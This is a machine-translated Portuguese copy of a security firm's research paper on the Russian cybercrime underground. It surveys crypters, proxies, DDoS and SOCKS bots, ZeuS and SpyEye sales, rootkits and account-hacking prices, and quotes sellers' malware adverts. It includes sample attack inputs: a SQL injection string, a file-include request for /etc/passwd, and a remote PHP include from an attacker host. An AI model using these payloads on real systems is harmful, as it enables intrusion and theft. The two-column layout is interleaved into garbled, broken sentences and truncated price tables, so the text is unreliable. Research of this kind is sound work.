Escolar Documentos
Profissional Documentos
Cultura Documentos
russo
Subterrâneo 101
Max Goncharov
Machine Translated by Google
Conteúdo
Este artigo de pesquisa pretende fornecer um breve resumo do A criptografia de arquivos é empregada principalmente para ocultar
submundo do crime cibernético e lançar luz sobre os tipos básicos de arquivos infectados ou malware de software de segurança. As ofertas
atividade hacker na Rússia. A maior parte das informações contidas no mercado de criptografia podem ser categorizadas em duas:
neste documento foi baseada em dados recolhidos em fóruns e prestação de serviços reais para criptografar arquivos individuais
serviços online utilizados por cibercriminosos russos. Também (por exemplo, arquivos .EXE e .DLL) e vendas de criptografia.
nos baseámos em artigos escritos por hackers sobre as suas Para ocultar um arquivo malicioso ou malware do software de
atividades, as ameaças informáticas que criam e o tipo de segurança, os cibercriminosos usam várias técnicas de criptografia.
informação que publicam nos sites de compras dos fóruns. Quanto mais eficaz for a técnica utilizada, mais cara será a lima.
• Inserindo código lixo: Os blocos são divididos em seções, entre as quais Preços de criptografia
são inseridas instruções lixo.
Essas instruções não afetam o código, mas forçam o emulador a “suar”.
As instruções inúteis não são apenas usadas em blocos de código, mas Oferta Preço
também para executar ações úteis que complicam o trabalho de
Criptografia estatística básica US$ 10–30
um analisador antimalware de todas as maneiras possíveis.
Stub crypter com vários US$ 30–80
complementos
• Combinação de todos os métodos mencionados acima: Todos os Cripta polimórfica US$ 100+
Um servidor dedicado [ÿÿÿÿÿÿ] é aquele que um usuário não compartilha Um servidor proxy [ÿÿÿÿÿÿ] é um computador intermediário que atua como
com outros. Ele pode ser usado para diversas atividades maliciosas, “proxy” ou mediador entre um computador e a Internet. Os servidores
desde força bruta até cardação, que um hacker preferiria não proxy são usados para diversos fins, como acelerar a transmissão de
realizar em sua própria máquina. dados e filtrar o tráfego, mas seu objetivo principal, que os torna populares
Os hackers normalmente se conectam a um servidor dedicado via VPN, entre os hackers, é garantir o anonimato. O anonimato, neste caso,
o que lhes proporciona anonimato. Os servidores dedicados estão vem do fato de o servidor de destino ver o endereço IP do servidor proxy
entre os produtos mais populares no mercado clandestino. São e não o do computador do hacker. Mesmo os hackers, no entanto,
considerados consumíveis únicos e com procura mais ou menos notaram frequentemente que, apesar da garantia dos operadores de
constante. Os servidores dedicados são normalmente vendidos às servidores proxy, todos esses servidores, mesmo os pagos, mantêm
dezenas ou centenas, com preços dependendo do seu poder de registos e não podem fornecer anonimato completo.
processamento e, em maior medida, da velocidade de acesso à Internet.
Os servidores são essenciais em uma operação cibercriminosa, Os principais tipos de servidores proxy são:
especialmente para ataques de força bruta em amplas faixas de
endereços IP. Os hackers também oferecem serviços de força bruta • Servidor proxy HTTP: A forma mais comum de servidor proxy. Na
porque os servidores dedicados têm os chamados “tempos de vida”, verdade, um servidor proxy geralmente se refere a esse tipo de
dependendo de vários fatores, sendo os mais importantes as medidas que servidor. No passado, esse tipo de servidor permitia apenas aos
um administrador implementa para garantir a segurança do servidor. usuários visualizar páginas da web e imagens, bem como baixar
arquivos. As versões mais recentes de aplicativos (por exemplo,
ICQ, etc.) podem ser executadas através de um servidor proxy
Os serviços de hospedagem à prova de balas [ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ], que HTTP. Qualquer versão do navegador também funciona através deste tipo de ser
permitem aos cibercriminosos hospedar qualquer tipo de material
em um site ou página sem se preocupar com a possibilidade de ele ser • Servidor proxy SOCKS: Este tipo de servidor proxy funciona com
removido devido a denúncias de abuso, também estão amplamente praticamente todo tipo de informação disponível na Internet (ou seja,
disponíveis no mercado clandestino. TCP/IP). Para usar servidores proxy SOCKS, entretanto, os programas
devem ser explicitamente capazes de trabalhar com eles.
Preços de servidores dedicados Programas adicionais são necessários para que um navegador
use um servidor proxy SOCKS. Os navegadores não podem
funcionar sozinhos em servidores proxy SOCKS, mas qualquer versão
Oferta Preço do ICQ e vários outros programas populares funcionam muito bem
neles. Ao trabalhar com servidores proxy SOCKS, suas versões
Servidor dedicado US$ 0,50–1
(ou seja, SOCKS4 ou SOCKS5) devem ser especificadas.
Servidor poderoso US$ 10–20
Bots de meias
• Servidor proxy FTP: Este tipo de servidor proxy é bastante raro Um bot SOCKS é incorporado em um sistema, reside no processo
e pouco utilizado, exceto em redes corporativas. Os servidores explorer.exe, contorna firewalls por meio de um driver, é registrado em
proxy FTP são comumente usados por organizações que instalam estatísticas e abre o SOCKS em uma porta escolhida. Ele armazena
firewalls – sistemas que protegem os computadores contra invasões informações sobre si mesmo em um script, que informa quando acessar
externas – o que impede o acesso direto à Internet. Eles são um servidor. Se uma conexão SOCKS for bem-sucedida, o bot se grava
suportados por muitos gerenciadores de arquivos populares (por no banco de dados de bots SOCKS válidos. Seus processos permanecem
exemplo, File and ARchive [FAR] e Windows Commander), invisíveis enquanto são executados no processo explorer.exe. Além de
gerenciadores de download (por exemplo, GetRight e ReGet) e contornar firewalls por meio de um driver, ele também contorna medidas de
navegadores. segurança proativas apertando e cutucando botões. É fácil de
administrar; exibe todas as informações possíveis sobre uma máquina
capturada, incluindo o conteúdo do armazenamento protegido; pode baixar
Assim como os servidores dedicados, os servidores proxy também e executar arquivos .EXE de qualquer URL; se autodestrói quando
devem ser adquiridos. Existem vários métodos para fazer isso, desde uma encontrado; tem a função kamikaze; pode emitir comandos para
simples pesquisa no Google até o uso de diversos scanners, incluindo aqueles bots individuais ou bots em diferentes países; possui dois programas
que os próprios hackers escrevem. Alguns Trojans especiais também administrativos de backup, além de um programa principal para
transformam computadores conectados à Internet em servidores gerenciamento de bot; suporta MEIAS5; quando compactado, tem
proxy. Assim como os servidores dedicados, os servidores proxy também apenas 56kb de tamanho, o que é essencialmente sem importância
são frequentemente vendidos em massa às dezenas e centenas e têm se um carregador for usado; é escrito puramente em C++; e é vendido por US$
demanda constante. 100.
“Lista de servidores proxy: em média, US$ 1,50–3 para uma lista de 300,
US$ 2–4 para 500, US$ 3,50–5 para 1.000”
Serviços VPN
A tecnologia VPN é usada para criar um túnel seguro e criptografado em “Preços VIP72.com: Serviço proxy/ SOCKS - ilimitado/ mês US$ 33 serviço
um computador ao se conectar à Internet, por meio do qual os dados proxy/ SOCKS — 250 SOCKS/ mês US$ 25 serviço proxy/ SOCKS —
são transmitidos. Isso permite que um hacker use todos os tipos de 90 SOCKS/ 10 dias US$ 10, VPN: Dia — US$ 3, semana — EUA
programas convencionais (por exemplo, ICQ, Skype, e-mail ou US$ 9, mês — US$ 30, 6 meses — US$ 125, ano — US$ 235”
administração de sites), garantindo ao mesmo tempo que os dados
permaneçam criptografados mesmo quando transmitidos. Além disso,
os dados parecem ser transferidos não do endereço IP do hacker, “EUA — US$ 15/ mês; França — US$ 15/ mês; Brasil—US$ 20/
mas do endereço IP do provedor de serviços VPN. mês; México – US$ 20/ mês”
* Observe que os preços dos serviços VPN para o México e o Brasil são mais caros
porque são menos desenvolvidos tecnicamente em comparação com outros países.
Ou seja, quem não utiliza VPN faz tudo online com o auxílio do
ISP de sua escolha, inclusive abrindo sites e realizando outros serviços
mediante solicitação. O uso de uma VPN – um intermediário –
permite que hackers criptografem todas as solicitações emitidas e dados
recebidos da Internet. As VPNs protegem os dados e preservam o seu
anonimato, enviando pedidos de recursos online e transmitindo dados
utilizando os seus endereços IP e não os dos utilizadores, tornando-os
valiosos para os hackers.
Oferecendo Preço
No modelo de negócios do serviço pay-per-install (PPI), os anunciantes Em outras palavras, a classificação de um país é determinada pela
pagam uma comissão aos editores sempre que um usuário instala aplicativos probabilidade de um arquivo malicioso ser baixado e aberto por algum
geralmente gratuitos que acompanham adware. Em um ataque empresário ou empresa nele, o que permitirá que os cibercriminosos obtenham
PPI, uma instalação refere-se ao download e inicialização de um arquivo acesso a todos os tipos de informações confidenciais (por exemplo,
no computador da vítima. números de cartão de crédito) e talvez até acesso root a sites ou redes
Os downloads podem vir na forma de um pacote de exploração ou de corporativas.
uma botnet. Nesse tipo de ataque, um usuário que visita um site de
hospedagem de exploração usando um navegador vulnerável baixa e executa Dois tipos básicos de atividade ocorrem no mercado de serviços de
um script malicioso e infecta seu computador. download: ou um cliente oferece um arquivo malicioso para provedores de
Este é um dos meios mais populares de distribuição de malware (ou serviços de download ou um provedor de serviços de download oferece serviços
seja, na maioria das vezes Trojans). aos clientes. Também existem programas de parceiros para serviços
relacionados a download e tráfego.
Serviços de programação
Aqui está um exemplo de postagem de um cibercriminoso oferecendo Os serviços de programação referem-se àqueles necessários para
software de download, que ocasionalmente também é encontrado on- escrever programas de computador. Programadores que desejam ganhar
line (traduzido do russo): a vida oferecem seus serviços para escrever programas customizados
usando linguagens que vão desde assembly até Python. As ofertas também
“Baixar bot! -=UA-BOT=- Confira meu próximo desenvolvimento podem ser muito diversas, incluindo spammers, cavalos de Tróia e worms.
– um bot com controles administrativos simples e convenientes
em PHP. Ele baixa e inicia diferentes programas. Como bônus, inclui a
capacidade de executar solicitações HTTP GET; muito semelhante a um
Vendas de software
DDoS (faz sentido apenas com um grande número de bots ou, alternativamente,
para acionar contadores e outras pegadinhas, ou para criar um wrapper para
scripts confidenciais, etc.). Contate ICQ 9490610 para todos os detalhes. A venda de programas prontos para uso constitui uma grande parte do
Como parte dos meus testes, estou distribuindo um bot configurado usando mercado clandestino. Os produtos mais populares incluem diferentes
controles administrativos de teste. Um bot custa US$ 30, a costura custa US$ tipos de malware, Winlockers, cavalos de Tróia, spammers, aplicativos de
5.” força bruta, criptografadores e bots DDoS. Licenças para ZeuS, Pinch, SpyEye
e outros kits de ferramentas populares também são vendidas. Observe,
entretanto, que alguns fornecedores de programas não são necessariamente
os verdadeiros programadores. Os produtos mais comuns disponíveis são
aplicações web (isto é, PHP + MySQL) e programas escritos em C++ e C#.
Os ataques de negação de serviço (DoS) [ÿÿÿÿ] e DDoS são tipos de • Ataque de inundação TCP SYN: Envolve o envio de um enorme
ataques de hackers a computadores. Esses ataques criam condições número de solicitações para inicializar conexões TCP com um site de
nas quais usuários legítimos de computador têm acesso negado aos recursos destino, que é conseqüentemente forçado a gastar todos os seus
do sistema. Os hackers que os instigam não estão tentando invadir ilegalmente recursos para controlar as conexões parcialmente abertas feitas. Neste
computadores protegidos para roubar ou destruir dados. Eles só querem ataque, o hacker envia pacotes de sincronização para um alvo. Depois
paralisar sites ou computadores. de receber o primeiro pacote, o computador da vítima envia uma
resposta (ou seja, SYN ACK) e espera por um pacote ACK que nunca
chegará, causando um DDoS.
Esquematicamente, um ataque DDoS envolve um enorme número de
solicitações falsas de um grande número de computadores em todo o
mundo que inundam um servidor alvo. Como resultado, o servidor de • Ataque Smurf: Envolve o envio de solicitações de ping ICMP para um
destino gasta todos os seus recursos atendendo solicitações e fica praticamente endereço de transmissão de destino usando um endereço de origem falso
indisponível para usuários comuns. Os usuários dos computadores que por meio de falsificação de endereço IP.
enviam as solicitações falsas podem nem suspeitar que suas máquinas
foram hackeadas. • Inundação ICMP: Semelhante a um ataque Smurf sem a parte de
transmissão.
Os softwares DDoS foram inicialmente criados para fins não maliciosos, Os ataques DDoS geralmente exigem o uso de bots e botnets especialmente
como experimentos para estudar a capacidade de transferência das criados. Para instigar um ataque DDoS, um hacker deve primeiro obter
redes e sua tolerância a cargas externas. acesso ao computador alvo. Ele então instala um daemon usando seu
Nesse caso, usar um pacote ICMP estruturado incorretamente é mais kit de bot DDoS. Ele então faz a mesma coisa com várias outras máquinas,
eficaz porque requer muito processamento. Um pacote é despachado ao transformando todas elas em zumbis. O hacker então inicia o programa
remetente após determinar o que há de errado com ele. Consequentemente, mestre, que também vem do kit do bot DDoS, por conta própria ou em um
o objetivo principal – sufocar o tráfego da rede – é alcançado. sistema remoto e ordena que ele lance um ataque em um endereço IP
escolhido. O programa mestre então comanda todos os daemons para
atacar a vítima escolhida para fins como derrubar um site específico.
A seguir estão os diferentes tipos de ataque DDoS:
Aqui estão exemplos de postagens de criminosos cibernéticos que • Suporte a proxy SOCKS5: A porta padrão é 1080, mas pode ser
oferecem serviços DDoS (traduzidos do russo): alterada quando uma compilação é criada. Observe que este é um
proxy comum – não funciona em NAT. O bot é compatível com toda
“Bot Optima DDoS: O nome do arquivo no sistema não é composto a família Windows: Microsoft Windows 95 – Windows7. Não há razão
por números e não é apenas um conjunto de letras aleatórias. Pelo contrário, para não instalar.
é uma palavra ou abreviatura perfeitamente adequada, embora gerada
aleatoriamente.
• Funciona corretamente em sistemas de 64 bits
• Ignora o Firewall do Windows: O painel administrativo mostra
não apenas a versão do bot e do sistema operacional, mas • Funciona corretamente tanto com uma conta de administrador
também o tipo de conta (por exemplo, administrador ou usuário quanto com uma conta de usuário padrão
padrão).
• Protege contra downloads injustos (se um bot for
• A/ U correspondentemente baixado em um PC que já está infectado, a palavra “FAIL” é
exibida no painel administrativo). Em casos individuais, pode
• Capacidade de sobrescrever: um arquivo pode ser instalado sobre ser possível organizar o encerramento de um processo ou
outras versões do bot; as cópias mais antigas são removidas. A processos e outros ajustes leves.
atualização do Optima requer uma substituição.
O comando exe=url é usado para realizar uma atualização.
Uma equipe inteira trabalhou no bot: testadores, codificadores, • Desempenho fabuloso
fornecedores e promotores. Isso significa que a cada dia o
bot está melhorando. • Sistema avançado de emissão de agentes de usuários e
Bugs estão sendo encontrados e corrigidos rapidamente. O bot referências: gerado aleatoriamente a cada chamada.
apresenta quatro tipos de ataque DDoS: HTTP, ICMP (ping),
SYN e UDP. Nosso bot praticamente não carrega nenhum • Suporte técnico contínuo
sistema, o que permitirá que ele permaneça indetectável por
um longo tempo. Nosso bot é instalado em um sistema quase • Regula a força do ataque
que instantaneamente, o que evita qualquer suspeita por parte da
vítima. O bot é leve e se comporta bem no sistema. O painel de • Um comando pode ser seguido por um parâmetro
controle conveniente e intuitivo é altamente otimizado, o que reduz que indica um atraso para cada thread (ex: | 5): Os valores
a carga do servidor. variam de 0 a 9; “0” significa “sem atraso”. O padrão é “1”.
Consulte as perguntas frequentes para obter mais informações.
Essa mudança aumenta a capacidade de sobrevivência dos bots.
• Em dois idiomas (RU, EN): O bot roda em 100 (!) threads; um tempo
limite pode ser definido. Além disso, os threads estão quase
perfeitamente sincronizados entre si, possibilitando gerar a • Suportado pelos comandos dd1 e dd2
maior quantidade de tráfego HTTP.
• Suporte para determinados recursos para ignorar determinados
medidas de proteção anti-DDoS: O bot emula um navegador.
• Capaz de atacar simultaneamente vários URLs em um único
servidor
• Modularidade: você pode comprar complementos de bot (ou seja,
• Atacar servidores individuais (por exemplo, um fórum, um site de notícias de uso geral e personalizados).
bloco ou armazenamento de arquivo): durante esse tipo de
ataque, cada instância de bot seleciona alvos de forma • Mínimo: o bot DDoS sem atualização gratuita custa US$ 450.*
independente, o que resulta em um aumento múltiplo na carga do
servidor porque as respostas não podem ser armazenadas em cache.
• Padrão: o bot DDoS mais um mês de atualização gratuita custa
• Capaz de transferir e iniciar seus arquivos .EXE US$ 499.”*
“Fuma bot DDoS; Inundação HTTP GET/ POST, inundação UDP, inundação
SYN; preço: US$300; reconstruir: US$ 30”
Serviços de spam
“Bot DDoS 'ibot'; preço: US$ 350 (para os primeiros cinco clientes)” Spamming [ÿÿÿÿ] refere-se à distribuição em massa de mensagens
online. O spam pode ser temático ou não.
Spam temático destina-se a um público-alvo específico (ou seja,
“DARKNESS (OPTIMA) bot DDoS HTTP, ICMP (ping), lixo, frequentadores de sites de namoro, busca de emprego, negócios e
Preço de threads SYN 100 – pacote: US$ 350, atualizações: US$ 85, pornográficos). Um banco de dados de destinatários de mensagens em massa
reconstrução: US$ 35” desempenha um papel fundamental na distribuição de spam temático.
“Bot DDos G-Bot; preço: US$ 150; construtor: US$ 1.500” O spam sem tema, por outro lado, é enviado para praticamente qualquer
pessoa em uma ordem específica. O que é mais importante para esse tipo
de spam é que ele chegue ao maior número possível de usuários.
Redes de bots
Serviço caro de spam por e-mail usando US$ 50–500 por caso, uma botnet usa uma arquitetura peer-to-peer (P2P). Os comandos são
um banco de dados de clientes 50.000–1.000.000 e-mails transmitidos de um bot para outro, tornando a remoção de botnets
substancialmente mais complicada de executar. Certos protocolos de chat, como
Serviço de inundação de e-mail US$ 3 por 1.000 e-mails Para adicionar uma máquina a uma botnet, um programa especial deve ser
instalado nela. Este programa permite que hackers executem remotamente
Serviço de inundação de chamadas de US$ 2–5
1 hora (ou seja, normalmente desativa os
certas ações em uma máquina comprometida. Um computador pode ser
serviços de call center) infectado de várias maneiras (por exemplo, downloads drive-by e exploração
de vulnerabilidades).
Serviço de inundação de chamadas por 1 dia US$ 20–50
• Interceptar qualquer tipo de dados em trânsito Aqui estão exemplos de postagens de criminosos cibernéticos que
oferecem serviços ZeuS (traduzidos do russo):
Tudo o que um usuário permite que seu sistema “lembre” para ele (por
exemplo, nomes de usuário, senhas e outros dados de formulário) torna- “Venderei o código-fonte do ZeuS 2.0.8.9. Venda privada de código-fonte.
se acessível ao ZeuS. Mesmo que a vítima não salve essas informações em um Preço: US$ 400–500; a negociação (troca) é possível.”
computador infectado, um bot ainda pode rastrear quais teclas ele pressionou
e em que ordem foram pressionadas ao fazer login em um determinado site
por meio de keylogging. Todas essas informações são então enviadas ao “É aceita a venda do ZeuS 2.1.0.1 bin + configurado em sua
mestre do botnet. hospedagem por um depósito de US$ 200.”
Preços de botnets
Oferecendo Preço
Alguns hackers oferecem verificações de software de segurança Um Trojan [ÿÿÿÿÿÿ], abreviação de “cavalo de Tróia”, é um
[AV ÿÿÿÿÿÿÿÿ] ou serviços para verificar um arquivo malicioso em vários malware disfarçado de programa ou aplicativo de computador legítimo.
softwares de segurança. Quanto mais software de segurança um Trojan spyware, malware projetado especificamente para roubar
arquivo for verificado, mais caro será o serviço. dados do usuário, também estão disponíveis. Os tipos de dados que o
Nesses casos, os clientes obtêm relatórios a um custo muito baixo. spyware Trojan rouba incluem senhas do ICQ, listas de contatos,
documentos confidenciais, números de contas bancárias e assim por
Mesmo que existam vários serviços de verificação de arquivos on-line, os diante. As credenciais de contas de fóruns e redes sociais não são baratas.
hackers tendem a ser cautelosos com eles porque alguns podem
ser configurados por empresas de segurança para obter informações
sobre os arquivos maliciosos que foram testados. Os números ICQ são usados para distribuir spam ou para fins de
inundação. As credenciais da conta FTP são vendidas e usadas para
Preços de verificação de software de segurança fins de otimização de mecanismo de pesquisa (SEO) blackhat.
• Beliscar
• Zeus
• SpyEye
“Confira minha versão privada, que foi projetada para interceptar • Acesso instantâneo a todos os serviços: Capacidade de ler todos
chaves do amplo sistema bancário iBank. O iBank é usado pelos os SMS recebidos e enviados de um assinante.
principais bancos da CEI, como AlfaBank, UkrSotsBank, Banco de
Moscou… Para obter detalhes, revise a lista de bancos (Rússia). A • Função para visualizar o remetente/ destinatário, incluindo seu
funcionalidade principal é implementada em uma DLL e começa a nome tal como está (conforme registrado na agenda do
funcionar automaticamente assim que a biblioteca é carregada na telefone no qual o programa está instalado)
memória (ou seja, você pode adicionar facilmente a funcionalidade
às suas ferramentas). É assim que funciona: • Modo totalmente furtivo, ou seja, não há
sinais de funcionamento do programa
• O Trojan procura a janela do cliente do banco, captura todas
as teclas pressionadas e chama arquivos na máquina • Completamente anônimo, ninguém conseguirá descobrir quem
virtual Java (ou seja, NÃO EXISTEM JANELAS FALSAS instalou o programa no telefone
que possam facilmente revelar a presença do Trojan na
máquina devido à ausência do banco de dados logotipo).
• O aplicativo funciona em roaming
• Após o fechamento da janela do cliente do banco, o Trojan cria • Foi implementada uma versão que roda em
um arquivo de sessão baseado nos dados capturados que modo invisível completo
contém todas as teclas pressionadas e a chave do banco
de forma codificada!!! O Trojan é adequado para versões online • O celular começa a transmitir mensagens
e locais do aplicativo cliente do banco.” somente quando estiver em modo standby, ou seja, quando seu menu
estiver desligado e nenhum botão estiver pressionado
“Também ofereço um bot ICQ que dá acesso de linha de comando a • Consequentemente, o usuário não suspeitará de nada
uma máquina e possui um DETECTOR DE DISPOSITIVO CONECTADO
integrado (ou seja, você saberá quando o token do banco for O programa custa US$ 350.”
inserido!!)!!! Tamanho: 15kb não compactado; desenvolvido em
montagem (FASM). Para espionagem, o Trojan altera a lista de “Estou vendendo o código-fonte do Limbo. Se você não sabe, este é
exportação de uma das DLLs Java. Isto garante a operação ESTÁVEL um Trojan que existe há dois anos. O preço é de US$ 300. Entre em
do sistema em oposição ao método INJECTION. Vou considerar vender o contato com o autor via PM.”
Trojan e o código-fonte (US$ 3.000).”
“Estou vendendo três controles administrativos para o SpyEye
“Estou vendendo um programa para interceptar SMS. O programa é 1.3 (cliente, principal e capturador de formulários); plug-ins para
baseado em um espião de SMS móvel. Funciona por meio de alarmes. a nova versão do SpyEye; colecionador da nova versão; despejo de
A funcionalidade do programa reside na transmissão simultânea banco de dados da nova versão; o manual mais detalhado sobre
de SMS. configuração e instalação do SpyEye 1.3. Cada linha nas configurações
é explicada: o quê, onde, como e por quê.
• Você envia um SMS do Skype para o telefone da vítima. Ou seja, todos os módulos da nova versão. Sem publicidade!
Um MMS chega. Quando o MMS é aberto, o programa é Estou pronto para mostrar capturas de tela dos controles administrativos
instalado automaticamente no telefone. e o que você quiser. A suíte custa US$ 300.”
Rootkits
Um rootkit [ÿÿÿÿÿÿÿ] é um programa que oculta certos elementos (por Aqui está um exemplo de postagem de um cibercriminoso
exemplo, arquivos, processos, entradas de registro do Windows, locais oferecendo rootkits (traduzido do russo):
de memória, conexões de rede, etc.) de outros programas ou do sistema
operacional de um computador. Os rootkits podem ocultar processos, “Os drivers são carregados antes da inicialização do kernel do NT, o que
chaves de registro e outras evidências da existência de software significa que eles são carregados antes do início do PatchGuard.
malicioso em um computador. No Windows, todos os aplicativos A assinatura digital do motorista não é necessária. Todas as versões
são executados no Anel 3. O sistema e os drivers, por outro lado, operam do sistema operacional Windows são suportadas do XP ao 7 SP1,
no Anel 0. Os programas executados no Anel 0 naturalmente têm inclusive. Duas arquiteturas são suportadas – x86 e AMD64 (EM64T).
habilidades significativamente maiores. Observe, entretanto, que nem O código do carregador muda. Consiste em um certo número de blocos
sempre é possível passar do Anel 3 para o Anel 0. Esta é a razão pela que são deslocados aleatoriamente cada vez que o projeto é construído.
qual existem dois tipos de rootkit— Assim, a imagem binária de cada carregador recém-compilado difere
aqueles que funcionam no nível do aplicativo e aqueles que funcionam da anterior.
no nível do kernel. O projeto é construído usando MS Visual Studio 2005 e MS Windows
XP DDK. Ele foi desenvolvido primeiro para x86 e AMD64. O preço é
As funções da interface de programação de aplicativos (API) existem para US$ 292.”
permitir a comunicação entre programas e um computador.
Uma API é um conjunto de funções projetadas para que o usuário
possa acessar o kernel de um computador no nível do aplicativo. Se
um programa quiser visualizar uma lista de arquivos em um diretório, ele
deverá chamar diversas funções de API. Uma das maneiras pelas quais
o malware oculta arquivos é interceptar e alterar chamadas de
função de API.
Preços de rootkits
Oferta Preço
Bootkits, que são mais eficazes que rootkits, também estão disponíveis,
mas são caros. Um carregador de boot para drivers possibilita o
download de drivers especialmente montados assim que o sistema
operacional é iniciado.
Engenharia social é um termo que crackers e hackers usam para O hacking de contas [ÿÿÿÿÿ ÿÿÿÿÿ] é muito popular entre os
denotar acesso não autorizado a informações por meio de algo cibercriminosos. A procura por tal serviço é enorme, por isso os
diferente do uso de software. O objetivo é ser mais esperto que as anúncios deste tipo abundam nos mercados clandestinos. Os
pessoas para obter suas senhas ou outras informações confidenciais alvos de hackers mais comuns são contas de e-mail e redes sociais.
que possam ajudar os cibercriminosos a violar a segurança de Contas de sites e fóruns invadidas são vistas com menos frequência.
seus computadores. Os tipos clássicos de fraude incluem fazer Na verdade, cada pedido concreto geralmente é tratado separadamente
ligações telefônicas para uma empresa para verificar quem possui as em uma conversa privada.
informações necessárias e, em seguida, ligar para seu
administrador usando a identidade de um funcionário com problema
urgente de acesso ao sistema.
Força bruta
Na sua forma pura, a engenharia social não atrai fraudadores.
No entanto, podem ser encontrados serviços de formação em A força bruta [ÿÿÿÿ] é um dos meios mais antigos pelos quais os
engenharia social, embora sejam bastante raros. A engenharia cibercriminosos invadem e-mails e outras contas (por exemplo,
social permite principalmente que os fraudadores invadam as contas FTP, Telnet e ICQ). A força bruta é simplesmente “adivinhar a senha
de e-mail ou de redes sociais das vítimas. Ele também atrai de alguém”. Programas especiais que automatizam esse processo
efetivamente as pessoas a visitarem páginas da web carregadas de exploraçãoestão disponíveis no mercado clandestino. Tudo o que é necessário é
e phishing.
compilar um bom feed de dicionário. Em seguida, ele tentará cada senha,
uma de cada vez, e informará qual delas funciona.
Explorando vulnerabilidades de sites Uma das vulnerabilidades mais exploradas via SiXSS é o chamado
“bug de inclusão”. Para simplificar o processo de adição de novas
páginas a um site ou outras tarefas semelhantes, os administradores
Os sites são mais comumente vulneráveis à injeção de SQL e ao cross- do site usam a função include($file) em scripts onde $file é definido
site scripting (XSS). pelo usuário ou especificado em uma URL (por exemplo, <a href=http ://
victim.com/news.php?file=somefiletarget=“_
Injeção SQL em branco”> http://victim.com/news.php?file=somefile</a>).
Em vez da função include(), o conteúdo de algum arquivo é inserido. Isso
A injeção de SQL ocorre quando um usuário insere dados para formar pode ser muito conveniente, mas se o valor dos dados inseridos pelo
consultas SQL sem verificação e um hacker insere dados que lhe usuário não for verificado, mais cedo ou mais tarde, um usuário mal-
permitem obter qualquer tipo de informação de um banco de dados SQL. intencionado poderá facilmente inserir <a href=“http://victim.com/
A solicitação utilizando a consulta, SELECT login, senha FROM membros news.php?file=/etc/passwd” target=“_blank”>http://vítima.
onde email='$email';”, onde o valor de $email é inserido pelo usuário em com/news.php?file=/etc/passwd</a> para obter o conteúdo de uma
uma tabela, é processada em uma página web. Os resultados dessa página.
consulta também são exibidos em uma página da web. Um hacker pode
modificar esses dados e inserir 'my@mail.ru'OU login LIKE '%admin%'” O bug de inclusão do PHP é uma vulnerabilidade bastante interessante
no formulário. A solicitação SQL se tornará então SELECT login, que pode ser considerada uma subespécie do bug de inclusão.
password FROM membros onde email='my@mail.ru' OR login LIKE Ao contrário do bug de inclusão, o bug de inclusão do PHP não tem como
'%admin%';, o que permitirá que um hacker obtenha as senhas de usuários objetivo obter dados de algum arquivo, mas sim inserir código PHP
cujos nomes de usuário tenham 'admin '. em uma página e posteriormente executar esse código no servidor da
página. Aqueles familiarizados com PHP sabem que fragmentos de código
agrupados em <? ... ?> ou <?php ... ?>) são simplesmente inseridos em
uma página web. Quando processados por um servidor linha por linha,
Script entre sites esses fragmentos são executados. Em outras palavras, pedaços de
código podem ser inseridos em uma página da web explorando um bug de
XSS é comumente usado para hackear contas de e-mail. Ele permite inclusão do PHP.
que o JavaScript seja executado no navegador da vítima, possibilitando
que bandidos roubem cookies ou sequestrem sessões abertas. Uma página da web com o conteúdo do código 'include($file)' onde o valor
XSS, entretanto, não é fácil de executar. Para hackear a conta de e-mail de $file é definido por um usuário pode ser explorada. Um hacker
de uma vítima, primeiro é necessário encontrar uma vulnerabilidade XSS pode preparar antecipadamente um arquivo com o código PHP que deseja
no site que armazena as credenciais de sua conta. Porém, é possível executar em um servidor vulnerável. Ele então carrega o arquivo em seu
encontrar e comprar explorações para vulnerabilidades comuns em Mail.ru próprio servidor web e insere a solicitação, <a href=“http://victim.com/
e Yandex.ru em vários fóruns. news.php?file=http://attacker.
host.com/php_code.php” target=“_blank”>http://vítima.
com/news.php?file=http://att...om/php_code.php</a>. Isso insere o código
Script entre sites de injeção SQL
PHP do hacker na página vulnerável, que é então executada por seu
servidor.
Injeção de SQL XSS (SiXSS) é uma combinação de injeção de
SQL e XSS – instigando um ataque XSS por meio de uma
vulnerabilidade de injeção de SQL usando um script. Usando Sniffers, Trojans, Sites de
Phishing e Engenharia Social
Sendo um dos meios mais antigos pelos quais os cibercriminosos “Mail.ru (List.ru, BK.ru, Inbox.ru): US$ 70; Yandex.ru: US$ 70;
roubam senhas, o phishing continua eficaz até hoje. Rambler.ru: US$ 70; Gmail.com: US$ 85; Pochta.ru: US$ 60; UKR.net: US$
Os bandidos criam cópias falsas de páginas de login, que coletam credenciais 60; Odnoklassniki.ru (fornecido com um endereço de e-mail): US$85;
de usuários. Os usuários que examinam URLs e páginas, no entanto, têm Vkontakte.ru (fornecido com um endereço de e-mail): US$ 85”
maior probabilidade de cair em meios mais sofisticados de roubo de
dados, daí o surgimento da engenharia social.
Oferecendo Preço
“Mail.ru, Bk.ru, Inbox.ru, List.ru: US$ 97; Mail.qip.ru: US$ 97; Gmail.ru: US$
97; Yandex, Rambler: US$ 130; Ngs.ru, caixa de entrada.
lv, @gmx.de, AOL.com: US$ 130; @i.ua (UA.fm, Email.ua), @ukr.net,
@ukrpost.net, Bigmir.net: US$ 130; Gmail.com, Googlemail.com: US$
162; Yahoo.com: US$ 162; Hotmail.
com: US$162; se o endereço de e-mail das redes sociais, ICQ e Skype for
desconhecido, o custo será de US$ 325; se o e-mail for conhecido, então:
Odnoklassniki: US$ 130, Vkontakte: US$ 130, Mamba.ru: US$ 130,
Facebook.com: US$ 130, Twitter.
com: US$ 130; Serviços de mensagens instantâneas: Skype.com: US$
130, ICQ.com: US$ 130; aquisição do endereço IP do alvo: US$65; e-
mail corporativo: US$ 500 por caixa de correio”
Para confirmar a identidade de um usuário, alguns cibercriminosos exigem Os serviços de fraude por SMS são bastante raros, em grande parte
cópias digitalizadas de documentos (por exemplo, passaporte, carteira de devido ao desenvolvimento da Internet e ao surgimento de formas mais simples
motorista, etc.). Se, por exemplo, um hacker precisar verificar uma conta do de ganhar dinheiro. Às vezes, porém, podem ser encontrados serviços para
PayPal, ele precisará enviar uma cópia digitalizada do passaporte ou da carteira enviar SMS usando números falsos ou para ativar outros serviços via SMS.
de motorista do proprietário. Cópias digitalizadas de documentos vendem
muito bem no mercado clandestino. Alguns também oferecem serviços para
retrabalhar documentos digitalizados usando um modelo. Preços de serviços de fraude de SMS
Cópias digitalizadas de bancos de dados são difíceis de encontrar, mas
também existem no mercado clandestino.
Oferta Preço
